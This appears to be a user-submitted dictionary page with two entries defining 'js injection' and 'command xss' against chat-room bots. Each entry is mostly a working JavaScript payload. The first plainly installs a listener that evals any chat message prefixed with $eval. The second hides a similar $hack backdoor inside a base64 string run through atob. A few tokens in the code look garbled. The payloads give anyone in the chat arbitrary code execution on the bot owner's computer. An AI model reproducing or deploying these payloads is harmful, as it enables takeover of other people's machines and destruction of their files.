2 definitions by Melissa 2000

^runjs bot.socket.on("message",function(data){let args=data.msg.split(" ");if("$eval"==args0)try{bot.socket.emit("message",eval(args.slice(1).join(" ")).toString())}catch(t){bot.socket.emit("message",t.toString())}});
/* js injection is a hacking method where hackers pass their payloads through arbitrary javascript */
/* Tom had to fix a bug in myspace because it allowed hackers to perform js injection and collect other users' passwords */
by Melissa 2000 April 3, 2021
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^evaljs eval1-1(atob("Ym90LnNvY2tldC5vbignbWVzc2FnZScsIGZ1bmN0aW9uKGRhdGEpIHsKICBsZXQgeCA9IGRhdGEubXNnLmluZGV4T2YoJyAnKTsKICBpZihkYXRhLm1zZy5zbGljZSgwLCB4KSA9PSAnJGhhY2snKSB7CiAgICB0cnkgewogICAgICBib3Quc29ja2V0LmVtaXQoJ21lc3NhZ2UnLCBldmFsKGRhdGEubXNnLnNsaWNlKHggKyAxKSkpOwogICAgfSBjYXRjaChlcikgewogICAgICBib3Quc29ja2V0LmVtaXQoJ21lc3NhZ2UnLCAiRVJSOiAiICsgZXIudG9TdHJpbmcoKSk7CiAgICB9CiAgfQp9KQ=="))
/* command xss is a type of XSS attack performed on chatroom bots to gain access to the host's computer */
/* They found a command xss in my bot and deleted all my files */
by Melissa 2000 April 7, 2021
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